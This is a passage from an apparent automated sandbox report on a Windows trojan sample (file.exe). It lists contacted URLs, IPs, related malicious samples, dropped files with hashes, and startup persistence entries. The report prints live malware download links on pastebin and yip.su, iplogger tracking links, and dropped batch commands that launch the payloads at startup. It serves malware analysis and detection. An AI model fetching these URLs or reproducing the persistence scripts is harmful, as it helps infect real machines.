                      http://upx.sf.net | 0% | URL Reputation | safe |
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
                      https://yip.su | 0% | Avira URL Cloud | safe |
                      https://www.cloudflare.com/learning/access-management/phishing-attack/ | 0% | Avira URL Cloud | safe |
                      https://iplogger.org/ | 0% | Avira URL Cloud | safe |
                      http://yip.su | 0% | Avira URL Cloud | safe |
                      https://yip.su/RNWPd | 0% | Avira URL Cloud | safe |
                      https://iplogger.com/1djqU4 | 0% | Avira URL Cloud | safe |
                      https://counter.yadro.ru/hit? | 0% | Avira URL Cloud | safe |
                      https://iplogger.org/rules/ | 0% | Avira URL Cloud | safe |
                      https://cdn.iplogger.org/redirect/logo-dark.png);background-position:center;background-repeat:no-rep | 0% | Avira URL Cloud | safe |
                      https://cdn.iplogger.org/favicon.ico | 0% | Avira URL Cloud | safe |
                      https://pastebin.com | 0% | Avira URL Cloud | safe |
                      https://yip.su/redirect- | 0% | Avira URL Cloud | safe |
                      https://pastebin.com/raw/V6VJsrV3 | 100% | Avira URL Cloud | malware |
                      https://pastebin.com/raw/V6VJsrV31https://yip.su/RNWPd.exe7https://iplogger.com/1djqU4 | 0% | Avira URL Cloud | safe |
                      https://iplogger.org/privacy/ | 0% | Avira URL Cloud | safe |
                      https://yip.su/RNWPd.exe | 100% | Avira URL Cloud | malware |
                      https://www.cloudflare.com/5xx-error-landing | 0% | Avira URL Cloud | safe |
                      Name | IP | Active | Malicious | Antivirus Detection | Reputation
                      yip.su | 188.114.96.3 | true | false | | unknown
                      pastebin.com | 172.67.19.24 | true | true | | unknown
                      iplogger.com | 172.67.188.178 | true | false | | unknown
                      Name | Malicious | Antivirus Detection | Reputation
                      https://iplogger.com/1djqU4 | false | Avira URL Cloud: safe | unknown
                      https://pastebin.com/raw/V6VJsrV3 | false | Avira URL Cloud: malware | unknown
                      https://yip.su/RNWPd.exe | false | Avira URL Cloud: malware | unknown
                      Name | Source | Malicious | Antivirus Detection | Reputation
                      https://www.cloudflare.com/learning/access-management/phishing-attack/ | InstallUtil.exe, 00000003.00000002.3538302079.00000000032D3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.000000000336C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.0000000003348000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.0000000003271000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                      https://counter.yadro.ru/hit? | InstallUtil.exe, 00000003.00000002.3538302079.000000000331E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.0000000003258000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, 3BKVENDizermJCmNwCB42ME3.exe.3.dr, lHi4knFRqmK4FFdSjJjLFDSD.exe.3.dr, vQTyYvkkcYOdC3ep2WUufnYJ.exe.3.dr, ya3fW80pEvNY3Pp8eIbfmN8e.exe.3.dr | false | Avira URL Cloud: safe | unknown
                      https://yip.su | InstallUtil.exe, 00000003.00000002.3538302079.0000000003317000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.0000000003271000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                      http://yip.su | InstallUtil.exe, 00000003.00000002.3538302079.0000000003317000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                      https://yip.su/RNWPd | InstallUtil.exe, 00000003.00000002.3538302079.000000000331E000.00000004.00000800.00020000.00000000.sdmp, 3BKVENDizermJCmNwCB42ME3.exe.3.dr, lHi4knFRqmK4FFdSjJjLFDSD.exe.3.dr, vQTyYvkkcYOdC3ep2WUufnYJ.exe.3.dr, ya3fW80pEvNY3Pp8eIbfmN8e.exe.3.dr | false
                            • Avira URL Cloud: safe
                            unknown
                            https://cdn.iplogger.org/favicon.icoInstallUtil.exe, 00000003.00000002.3538302079.000000000331E000.00000004.00000800.00020000.00000000.sdmp, 3BKVENDizermJCmNwCB42ME3.exe.3.dr, lHi4knFRqmK4FFdSjJjLFDSD.exe.3.dr, vQTyYvkkcYOdC3ep2WUufnYJ.exe.3.dr, ya3fW80pEvNY3Pp8eIbfmN8e.exe.3.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://iplogger.org/rules/InstallUtil.exe, 00000003.00000002.3538302079.000000000331E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.0000000003258000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, 3BKVENDizermJCmNwCB42ME3.exe.3.dr, lHi4knFRqmK4FFdSjJjLFDSD.exe.3.dr, vQTyYvkkcYOdC3ep2WUufnYJ.exe.3.dr, ya3fW80pEvNY3Pp8eIbfmN8e.exe.3.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://iplogger.org/InstallUtil.exe, 00000003.00000002.3538302079.000000000331E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.0000000003258000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, 3BKVENDizermJCmNwCB42ME3.exe.3.dr, lHi4knFRqmK4FFdSjJjLFDSD.exe.3.dr, vQTyYvkkcYOdC3ep2WUufnYJ.exe.3.dr, ya3fW80pEvNY3Pp8eIbfmN8e.exe.3.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://upx.sf.netAmcache.hve.3.drfalse
                            • URL Reputation: safe
                            unknown
                            https://cdn.iplogger.org/redirect/logo-dark.png);background-position:center;background-repeat:no-repInstallUtil.exe, 00000003.00000002.3538302079.000000000331E000.00000004.00000800.00020000.00000000.sdmp, 3BKVENDizermJCmNwCB42ME3.exe.3.dr, lHi4knFRqmK4FFdSjJjLFDSD.exe.3.dr, vQTyYvkkcYOdC3ep2WUufnYJ.exe.3.dr, ya3fW80pEvNY3Pp8eIbfmN8e.exe.3.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://yip.su/redirect-InstallUtil.exe, 00000003.00000002.3538302079.000000000331E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.0000000003258000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, 3BKVENDizermJCmNwCB42ME3.exe.3.dr, lHi4knFRqmK4FFdSjJjLFDSD.exe.3.dr, vQTyYvkkcYOdC3ep2WUufnYJ.exe.3.dr, ya3fW80pEvNY3Pp8eIbfmN8e.exe.3.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameInstallUtil.exe, 00000003.00000002.3538302079.00000000031B1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://pastebin.comInstallUtil.exe, 00000003.00000002.3538302079.0000000003271000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://pastebin.com/raw/V6VJsrV31https://yip.su/RNWPd.exe7https://iplogger.com/1djqU4file.exe, 00000000.00000002.2630838739.0000000002DC8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630838739.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630838739.000000000306C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3535416416.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://www.cloudflare.com/5xx-error-landingInstallUtil.exe, 00000003.00000002.3538302079.00000000032F9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.0000000003325000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.0000000003338000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.0000000003348000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.0000000003271000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.00000000031ED000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://iplogger.org/privacy/InstallUtil.exe, 00000003.00000002.3538302079.000000000331E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.0000000003258000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, 3BKVENDizermJCmNwCB42ME3.exe.3.dr, lHi4knFRqmK4FFdSjJjLFDSD.exe.3.dr, vQTyYvkkcYOdC3ep2WUufnYJ.exe.3.dr, ya3fW80pEvNY3Pp8eIbfmN8e.exe.3.drfalse
                            • Avira URL Cloud: safe
                            unknown
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.19.24 | pastebin.com | United States | 13335 | CLOUDFLARENETUS | true
188.114.96.3 | yip.su | European Union | 13335 | CLOUDFLARENETUS | false
172.67.188.178 | iplogger.com | United States | 13335 | CLOUDFLARENETUS | false
                            Joe Sandbox version:40.0.0 Tourmaline
                            Analysis ID:1490825
                            Start date and time:2024-08-09 22:59:09 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 7m 21s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:24
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:file.exe
                            Detection:MAL
                            Classification:mal100.troj.expl.evad.winEXE@28/8@3/3
                            EGA Information:
                            • Successful, ratio: 50%
                            HCA Information:
                            • Successful, ratio: 95%
                            • Number of executed functions: 124
                            • Number of non-executed functions: 30
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Execution Graph export aborted for target InstallUtil.exe, PID 4876 because it is empty
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            • VT rate limit hit for: file.exe
Time | Type | Description
17:00:51 | API Interceptor | 1x Sleep call for process: file.exe modified
17:00:52 | API Interceptor | 596828x Sleep call for process: InstallUtil.exe modified
23:00:54 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Q266LY31DJuBkUgU7rnVY9MU.bat
23:01:07 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\N7dCpczI2KMQNpAzS7xasjkw.bat
23:01:16 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Uknphp3q7QNTU5S7JDQd395T.bat
23:01:29 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7jqZT4DOBm3RwAn2PcA575yH.bat
23:01:37 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aQqevjV3RV9JJaF7h5x7Exf9.bat
23:01:45 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pltF0lsLekfh4Kak6kjaROUd.bat
23:01:58 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0aZULhs3yjKzrM4jdcsdY0pG.bat
23:02:07 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bPdKjWiyihutETqOInbK2Mh7.bat
23:02:15 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\r0jZki8LXw6VDzrX91cyCdNu.bat
23:02:23 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RLZSJnuvQOF9NbwJnvwyhUvy.bat
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            172.67.19.24sostener.vbsGet hashmaliciousRemcosBrowse
                            • pastebin.com/raw/V9y5Q5vv
                            Invoice Payment N8977823.jsGet hashmaliciousWSHRATBrowse
                            • pastebin.com/raw/NsQ5qTHr
                            Pending_Invoice_Bank_Details_XLSX.jsGet hashmaliciousWSHRATBrowse
                            • pastebin.com/raw/NsQ5qTHr
                            Dadebehring PendingInvoiceBankDetails.JS.jsGet hashmaliciousWSHRATBrowse
                            • pastebin.com/raw/NsQ5qTHr
                            PendingInvoiceBankDetails.JS.jsGet hashmaliciousWSHRATBrowse
                            • pastebin.com/raw/NsQ5qTHr
                            188.114.96.3Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exeGet hashmaliciousFormBookBrowse
                            • www.jnhdh8827.com/pz12/?uTm4D=tXrQrgXPfQCqrAqcdoT/KCxiftMWx+uc6jO1VE/0fl1BeE1n2goaTZbQHXHyD6os1JO7aTrmdA==&tX9tN=1bMtYrqh7B54XFQP
                            z4Nuevalistaadjunta.exeGet hashmaliciousDBatLoader, FormBookBrowse
                            • www.coinwab.com/kqqj/
                            ACCEPT_014STSY529093.PDF.exeGet hashmaliciousAzorultBrowse
                            • l0h5.shop/CM341/index.php
                            Ticari Siparis Belgesi 07 08 2024 18545075600_pdf.exeGet hashmaliciousFormBookBrowse
                            • www.jnhdh8827.com/pz12/?Fvt=tXrQrgXPfQCqrAqcdoT/KCxiftMWx+uc6jO1VE/0fl1BeE1n2goaTZbQHXLLcLIs9Jvq&3fMpsD=BfiHV2ph_4
                            Payment advice.exeGet hashmaliciousFormBookBrowse
                            • www.aggame.asia/0dmj/
                            709282738372873.exeGet hashmaliciousFormBookBrowse
                            • www.coinwab.com/kqqj/
                            Document 240000807.exeGet hashmaliciousFormBookBrowse
                            • www.lampgm.pro/em9t/
                            http://cs2024-cs.fdabv.com/Get hashmaliciousUnknownBrowse
                            • cs2024-cs.fdabv.com/
                            QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                            • filetransfer.io/data-package/HPg28kQA/download
                            QUOTATION_AUGQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                            • filetransfer.io/data-package/7wFhpez4/download
                            172.67.188.178SecuriteInfo.com.Win32.TrojanX-gen.2935.18945.exeGet hashmaliciousAmadey, DarkTortilla, RedLine, XWormBrowse
                              yLfAxBEcuo.exeGet hashmaliciousCryptbot, Vidar, XmrigBrowse
                                Arc453466701.msiGet hashmaliciousMetamorfoBrowse
                                  SecuriteInfo.com.BackDoor.SpyBotNET.62.21177.12908.exeGet hashmaliciousEICAR, PureLog Stealer, zgRATBrowse
                                    3qWvYGcbza.exeGet hashmaliciousUnknownBrowse
                                      3qWvYGcbza.exeGet hashmaliciousUnknownBrowse
                                        1cEhV3HjIY.exeGet hashmaliciousUnknownBrowse
                                          SecuriteInfo.com.Win64.DropperX-gen.29167.15583.exeGet hashmaliciousPureLog StealerBrowse
                                            2.exeGet hashmaliciousSmokeLoaderBrowse
                                              bS6MkUwj0r.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                yip.sufile.exeGet hashmaliciousDarkTortilla, NeoreklamiBrowse
                                                • 188.114.97.3
                                                SecuriteInfo.com.Trojan.Inject5.6732.13710.8794.exeGet hashmaliciousCryptbot, NeoreklamiBrowse
                                                • 188.114.97.3
                                                yLfAxBEcuo.exeGet hashmaliciousCryptbot, Vidar, XmrigBrowse
                                                • 188.114.97.3
                                                8998BC9FAF52DAB072698E932593819BFD772EE5C0C4519F30ECD55DE363505A.exeGet hashmaliciousBdaejecBrowse
                                                • 188.114.96.3
                                                file.exeGet hashmaliciousAmadey, GluptebaBrowse
                                                • 104.21.79.77
                                                file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                                                • 104.21.79.77
                                                LIRR4A0xzv.exeGet hashmaliciousAmadey, Glupteba, LummaC Stealer, Mars Stealer, SmokeLoader, Socks5Systemz, StealcBrowse
                                                • 172.67.169.89
                                                dl7WL77rkA.exeGet hashmaliciousGlupteba, Mars Stealer, Stealc, VidarBrowse
                                                • 172.67.169.89
                                                sTsbAmON9u.exeGet hashmaliciousLummaC, Amadey, Babuk, Djvu, RedLine, SmokeLoader, XmrigBrowse
                                                • 172.67.169.89
                                                amONbBvdCh.exeGet hashmaliciousLummaC, Amadey, Babuk, Djvu, RedLine, SmokeLoader, XmrigBrowse
                                                • 172.67.169.89
                                                pastebin.comfile.exeGet hashmaliciousDarkTortilla, NeoreklamiBrowse
                                                • 104.20.3.235
                                                SecuriteInfo.com.Trojan.Siggen29.14708.13579.16480.exeGet hashmaliciousStormKitty, XWormBrowse
                                                • 104.20.3.235
                                                SecuriteInfo.com.Trojan.Inject5.6732.13710.8794.exeGet hashmaliciousCryptbot, NeoreklamiBrowse
                                                • 104.20.3.235
                                                BlazeHack.exeGet hashmaliciousPureLog Stealer, RedLine, XmrigBrowse
                                                • 104.20.3.235
                                                CKHSihDX4S.exeGet hashmaliciousRedLine, XmrigBrowse
                                                • 104.20.4.235
                                                XXZahG4d9Z.exeGet hashmaliciousRedLine, XmrigBrowse
                                                • 104.20.4.235
                                                lp2wZPvBsS.exeGet hashmaliciousDCRatBrowse
                                                • 104.20.4.235
                                                Hash Cracking v1.0.exeGet hashmaliciousRedLineBrowse
                                                • 104.20.4.235
                                                yLfAxBEcuo.exeGet hashmaliciousCryptbot, Vidar, XmrigBrowse
                                                • 172.67.19.24
                                                ShadowCrypter.exeGet hashmaliciousClipboard Hijacker, XWormBrowse
                                                • 104.20.3.235
                                                iplogger.comyLfAxBEcuo.exeGet hashmaliciousCryptbot, Vidar, XmrigBrowse
                                                • 172.67.188.178
                                                Arc453466701.msiGet hashmaliciousUnknownBrowse
                                                • 104.21.76.57
                                                Arc453466701.msiGet hashmaliciousMetamorfoBrowse
                                                • 104.21.76.57
                                                Arc453466701.msiGet hashmaliciousMetamorfoBrowse
                                                • 104.21.76.57
                                                Arch0000000000.msiGet hashmaliciousMetamorfoBrowse
                                                • 104.21.76.57
                                                3qWvYGcbza.exeGet hashmaliciousUnknownBrowse
                                                • 172.67.188.178
                                                3qWvYGcbza.exeGet hashmaliciousUnknownBrowse
                                                • 104.21.76.57
                                                setup.exeGet hashmaliciousUnknownBrowse
                                                • 104.21.76.57
                                                YCImxTWoQs.exeGet hashmaliciousRedLineBrowse
                                                • 104.21.76.57
                                                w5ks798nGQ.exeGet hashmaliciousRedLineBrowse
                                                • 172.67.188.178
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                CLOUDFLARENETUSaccounting@cougar-contractors.com.htmGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                • 104.17.25.14
                                                http://theweber.groupGet hashmaliciousHTMLPhisherBrowse
                                                • 172.64.151.101
                                                botx.arm6.elfGet hashmaliciousMiraiBrowse
                                                • 104.30.145.62
                                                file.exeGet hashmaliciousDarkTortilla, NeoreklamiBrowse
                                                • 188.114.96.3
                                                [EXTERNAL] Complete with AdobeSignPDF_ Approve and Sign TRCOT.emlGet hashmaliciousUnknownBrowse
                                                • 104.18.95.41
                                                https://PoCloudCentral.crm.PowerObjects.net/PowerEmailWebsite//GetUrl2013.aspx?t=y3vuZubUq0iF06ZJWk4mdHUAbgBxADYANgBlAGUANwBiAGMAYgBkADQAZQA2ADQAOABhAGIAOAA1AGQAMwBhADYANAA5ADUAYQA0AGUAMgA%3D&eId=e3af09cd-5756-ef11-a317-002248046aa4&pval=https%3A%2F%2Fportal.apic.org%2Fs%2F%3Futm_campaign%3DCICcertprep_User_Upsell_Online_Extension%26utm_medium%3Dwebad%26utm_source%3DCIC_LS%26utm_content%3DExtendAccessNow%252F%23%2Fstore%2Fbrowse%2Fdetail%2Fa1BUd000004g98SMAQGet hashmaliciousUnknownBrowse
                                                • 104.17.25.14
                                                SecuriteInfo.com.Win64.Evo-gen.27204.8168.exeGet hashmaliciousAgentTeslaBrowse
                                                • 172.67.74.152
                                                https://t.co/NtdYAywq5HGet hashmaliciousHTMLPhisherBrowse
                                                • 104.16.123.96
                                                https://accountservicing.com/e3t/Ctc/2H+113/ccl-Y04/VVqYcj9d1pTLW16y89n4DRlWxW1xTZ7Q5jxmFNN5BW0Sj3qgyTW7Y8-PT6lZ3n-W7K16HT7thx4hV6kpN06fVkc-W7yxLrN95hXZjW4rblJ-6TSnSZW65gGqH4W43v4N3_YsqT-3YKYVxfV2W58G73YW3cFwVC8ny83jW8Fz12N8-V0SmW5SSzp43rM_L2W245fnt8p94jMW4PPrDY6Cb9HjW2Zf9wL3lKcTbW61Hhz233pYyDW5Qh4rN5z3QrwW1QwY5K38F8JxW433Jj716pqBlW5WlHSd1QR2ZcVsdP_h6JX3RcW6YQskh3NNSGKW9hbgq820G9QVW4RCZ8N3hkwKQW6Ykd0p7cQ_DrW48gHN96lLqMFW4402zd4Vsz0kW8KJCq78P_VX-f5RrgHM04Get hashmaliciousUnknownBrowse
                                                • 104.16.117.116
                                                MDI-Emissions-Estimator-2024.xlsGet hashmaliciousUnknownBrowse
                                                • 104.17.25.14
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | DarkTortilla, Neoreklami | 172.67.19.24, 172.67.188.178, 188.114.96.3
 | SecuriteInfo.com.Win64.Evo-gen.27204.8168.exe | malicious | AgentTesla | 172.67.19.24, 172.67.188.178, 188.114.96.3
 | SecuriteInfo.com.Win32.PWSX-gen.8266.31032.exe | malicious | AgentTesla | 172.67.19.24, 172.67.188.178, 188.114.96.3
 | SecuriteInfo.com.Win32.DropperX-gen.709.18225.exe | malicious | AsyncRAT, DcRat | 172.67.19.24, 172.67.188.178, 188.114.96.3
 | SecuriteInfo.com.Trojan.DownLoader47.7362.16444.30811.exe | malicious | Unknown | 172.67.19.24, 172.67.188.178, 188.114.96.3
 | SecuriteInfo.com.Trojan.Siggen29.14708.13579.16480.exe | malicious | StormKitty, XWorm | 172.67.19.24, 172.67.188.178, 188.114.96.3
 | SecuriteInfo.com.Trojan.TR.Dropper.Gen.31130.17125.exe | malicious | Quasar | 172.67.19.24, 172.67.188.178, 188.114.96.3
 | SecuriteInfo.com.Win32.PWSX-gen.25135.17011.exe | malicious | AgentTesla | 172.67.19.24, 172.67.188.178, 188.114.96.3
 | SecuriteInfo.com.Trojan.DownLoader47.7362.16444.30811.exe | malicious | Unknown | 172.67.19.24, 172.67.188.178, 188.114.96.3
 | SecuriteInfo.com.Win32.DropperX-gen.11831.8378.exe | malicious | AsyncRAT, DcRat | 172.67.19.24, 172.67.188.178, 188.114.96.3
                                                No context
                                                Process:C:\Users\user\Desktop\file.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1216
                                                Entropy (8bit):5.34331486778365
                                                Encrypted:false
                                                SSDEEP:24:MLUE4K5E4KH1qE4x84qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHxviYHKh3oPtHo6hAHKzea
                                                MD5:7B709BC412BEC5C3CFD861C041DAD408
                                                SHA1:532EA6BB3018AE3B51E7A5788F614A6C49252BCF
                                                SHA-256:733765A1599E02C53826A4AE984426862AA714D8B67F889607153888D40BBD75
                                                SHA-512:B35CFE36A1A40123FDC8A5E7C804096FF33F070F40CBA5812B98F46857F30BA2CE6F86E1B5D20F9B6D00D6A8194B8FA36C27A0208C7886512877058872277963
                                                Malicious:true
                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                Category:dropped
                                                Size (bytes):7462
                                                Entropy (8bit):5.420482116403958
                                                Encrypted:false
                                                SSDEEP:192:5LP+u+v13xV1cSHYu+zogDLIIUObDz5p7KoxSR1yz:5D+hv13T1FH0fHIIPD9xKu
                                                MD5:77F762F953163D7639DFF697104E1470
                                                SHA1:ADE9FFF9FFC2D587D50C636C28E4CD8DD99548D3
                                                SHA-256:D9E15BB8027FF52D6D8D4E294C0D690F4BBF9EF3ABC6001F69DCF08896FBD4EA
                                                SHA-512:D9041D02AACA5F06A0F82111486DF1D58DF3BE7F42778C127CCC53B2E1804C57B42B263CC607D70E5240518280C7078E066C07DEC2EA32EC13FB86AA0D4CB499
                                                Malicious:false
                                                Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="shortener, iplogger, shortlink, url, domain" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="" />..<meta property="og:description" content="" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="og:url" content="https://yip.su/R
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):72
                                                Entropy (8bit):4.86924805016808
                                                Encrypted:false
                                                SSDEEP:3:Ljn9m1N+E2J5JtbX3EczbiF:fE1N723jbEcXm
                                                MD5:F0CADC91C7B3B58616C49687D377FD10
                                                SHA1:BE08F749CFF27555A847B40D0BBAE9B123B44D99
                                                SHA-256:C1EFA09C10A2AEBD0A914729EA4DDF4A312BBA8D403EA0E7FE61E0DD39966E9D
                                                SHA-512:FA676321EF0BAE3A75924A97C3A0F7C764ED46D0CD02ABF132883C45E1DD6909E8A88AED2B672C88BF98090A1B104B96B21A8C6C41205EDD3E803779C0EDF2BD
                                                Malicious:true
                                                Preview:start "" "C:\Users\user\AppData\Local\lHi4knFRqmK4FFdSjJjLFDSD.exe"
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):72
                                                Entropy (8bit):4.850567800613269
                                                Encrypted:false
                                                SSDEEP:3:Ljn9m1N+E2J5cGGXHOMFn:fE1N723crHOMF
                                                MD5:7376752613C7B530196EBDA552841E3E
                                                SHA1:84EF1E10BB0910485F6E4A7A8AB84F3D7C3BC8EA
                                                SHA-256:00F9BC5007271E3A50C295E4080E0F505932055D53F0B9895BE2E87618D2E725
                                                SHA-512:A62A9EAC4623FE33E3FACD035E566C88D34701F3399EC462C308BAD796A8EFE98D7F2AE3EE70837E02DEDF1350CDE528E1F3A1132711794BA9767994BBE78D63
                                                Malicious:true
                                                Preview:start "" "C:\Users\user\AppData\Local\ya3fW80pEvNY3Pp8eIbfmN8e.exe"
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                File Type:MS Windows registry file, NT/2000 or above
                                                Category:dropped
                                                Size (bytes):1835008
                                                Entropy (8bit):4.465924024716172
                                                Encrypted:false
